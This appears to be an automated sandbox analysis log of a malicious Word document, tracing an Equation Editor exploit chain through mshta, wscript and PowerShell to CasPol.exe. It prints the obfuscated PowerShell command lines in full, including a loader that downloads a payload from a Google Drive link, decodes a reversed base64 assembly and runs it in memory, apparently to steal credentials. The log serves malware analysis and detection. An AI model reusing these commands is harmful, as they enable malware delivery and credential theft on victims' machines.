                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.dr OLE document summary: edited time not present or 0
                  Source: ~WRD0000.tmp.0.dr OLE document summary: title field not present or empty
                  Source: ~WRD0000.tmp.0.dr OLE document summary: title field not present or empty
                  Source: ~WRD0000.tmp.0.dr OLE document summary: title field not present or empty
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: that the path is correct and try again
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: + dEvicECREdeNTiALDEplOYMeNt.eXe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: String) [], CommandNotFoundException
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: True
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: CasPol.exe, CasPol.exe, 00000017.00000002.539517729.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PO NAHK22012FA00000.docx.doc | ReversingLabs: Detection: 13%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: oleacc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
